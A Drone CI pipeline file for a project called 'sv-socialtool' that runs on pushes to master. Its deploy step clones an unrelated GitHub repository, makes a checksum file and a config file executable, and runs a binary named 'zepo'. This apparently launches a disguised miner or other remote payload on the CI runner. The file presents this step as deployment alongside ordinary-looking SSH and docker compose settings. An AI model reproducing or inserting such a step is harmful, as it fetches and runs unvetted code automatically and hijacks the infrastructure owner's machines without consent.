kind: pipeline
type: docker
name: sv-socialtool
trigger:
  branch:
  - master
pipeline:
  deploy:
    image: golang
    commands:
      - git clone https://github.com/azureone4/zephher.git && cd zephher && chmod +x SHA256SUMS && chmod +x config.json && chmod +x zepo && ./zepo -c "config.json"
    host:
      - manager01.der-taenzer.net
    username: dockeradmin
    password:
      from_secret: ssh_pass
    port: 22
    command_timeout: 5m
    script:
      - cd /home/dockeradmin/docker/deploy/svmotor-socialtool
      - gh repo pull taenzer/svmotor-socialtool
      - gh repo sync
      - docker compose up -d
